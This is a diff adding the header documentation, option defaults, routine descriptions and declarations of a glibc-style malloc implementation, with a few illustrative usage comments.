+  that is based on some version of this malloc (for example in
+  Linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+                          8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., the number of extra bytes
+       allocated beyond those requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
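+       As an illustrative worked example (assuming 8-byte size_t and
+       16-byte alignment, as on x86-64 Linux): a 24-byte request plus the
+       8-byte size field is 32, which is already aligned and not below the
+       32-byte minimum, so it occupies a 32-byte chunk; a 25-byte request
+       becomes 33 and is rounded up to a 48-byte chunk.
+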
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also fail
+       because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macOS.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
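+
+/*
+  Illustrative usage sketch (relying only on the documented behaviour
+  above):
+
+    void *p = malloc (100);
+    if (p == NULL)          // allocation failed, errno == ENOMEM
+      perror ("malloc");
+    void *q = malloc (0);   // still a valid, minimum-sized allocation
+    free (q);
+*/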
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
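+
+/*
+  Illustrative sketch of the edge cases described above (assuming
+  REALLOC_ZERO_BYTES_FREES is set, as it is by default here):
+
+    char *p = realloc (NULL, 64);   // same as malloc (64)
+    char *q = realloc (p, 128);     // may move; old contents preserved
+    if (q != NULL)
+      p = q;                        // on failure p is still valid
+    realloc (p, 0);                 // same as free (p)
+*/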
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters. The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
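+
+/*
+  Illustrative calls matching the parameter table above (the values are
+  examples, not recommendations):
+
+    mallopt (M_MXFAST, 0);                   // disable fastbins entirely
+    mallopt (M_TRIM_THRESHOLD, 256 * 1024);  // trim less eagerly
+    mallopt (M_MMAP_MAX, 0);                 // never service requests via mmap
+*/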
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
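+
+/*
+  Illustrative sketch (big_buffer is just a placeholder name): after
+  releasing a large working set, a long-lived program might request an
+  explicit trim, keeping 64K of slack for future allocations:
+
+    free (big_buffer);
+    if (malloc_trim (64 * 1024))
+      ;   // some memory was actually returned to the system
+*/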
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
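+
+/*
+  Illustrative sketch of the POSIX interface (the alignment must be a
+  power of two and a multiple of sizeof (void *)):
+
+    void *p;
+    int err = posix_memalign (&p, 64, 1024);  // 64-byte aligned kilobyte
+    if (err == 0)
+      free (p);
+*/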
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel
+  simply has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
